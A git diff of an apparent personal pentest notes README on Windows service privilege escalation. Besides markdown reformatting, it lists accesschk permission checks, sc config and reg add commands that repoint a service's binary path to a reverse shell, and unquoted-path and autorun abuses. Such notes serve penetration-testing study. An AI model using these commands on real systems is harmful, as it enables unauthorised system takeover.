Alikhoshkholgh/HackBook/windows-Local-Enum/README.md

-#### windows service Enumerations and exploits for privEsc:
+# windows service Enumerations and exploits for privEsc:

-	---------NOTE: in most of the cases we only want to replace service binary with our reverse-shell.exe. so, we look for binary path in any way we can to do this
+	**NOTE**: in most of the cases we only want to replace service binary with our reverse-shell.exe. so, we look for binary path in any way we can to do this

-	---------NOTE: Download this Binary: accesschk.exe. this helps you better enumerate file and directory permissions on that system.
+	**NOTE**: Download this Binary: accesschk.exe. this helps you better enumerate file and directory permissions on that system.

-	---------NOTE: after replacing the service binary YOU SHOULD BE ABLE TO RESTART THE TARGET SERVICE
+	**NOTE**: after replacing the service binary YOU SHOULD BE ABLE TO RESTART THE TARGET SERVICE

--------	1- first of all we can use this command to take a look at the service:
+	1- first of all we can use this command to take a look at the service:

 		"cmd.exe /c sc qc <serviceName>"

--------	2- Insecure Service Permissions: try to set binpath in target service-configuration(note: changing binaryPath):
+	2- Insecure Service Permissions: try to set binpath in target service-configuration(note: changing binaryPath):

 		+ sc config <serviceName> binpath=<Path-to-reverseShell>

 		+ check for this ability: .\accesschk.exe /accepteula -uwcqv <username> <service-name>

--------	3- Unquoted path file: try to create reverse_shell filename similar to folder-names. in case that you have write permissions
+	3- Unquoted path file: try to create reverse_shell filename similar to folder-names. in case that you have write permissions

 		+ check if we can write to where we want: .\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

--------	4- Weak Registry Permissions:
+	4- Weak Registry Permissions:

 		+ check if we can write to service's registry: .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<Service-name>

 		+ overwrite binaryPath in registry: reg add HKLM\SYSTEM\CurrentControlSet\services\<Service-name> /v ImagePath /t REG_EXPAND_SZ /d <reverse-shell path> /f

-------- 5- permission to write on actual service's executable file.
+	5- permission to write on actual service's executable file.

 		+ check: .\accesschk.exe /accepteula -quvw "C:\Program Files\<path-to-executable-file-for-servcie>.exe"

-####### Registry
+# Registry

----------------	1- AutoRun applications Registry:
+	1- AutoRun applications Registry:

 			NOTE: look for registry-key for autoRun applications. then find the executable location.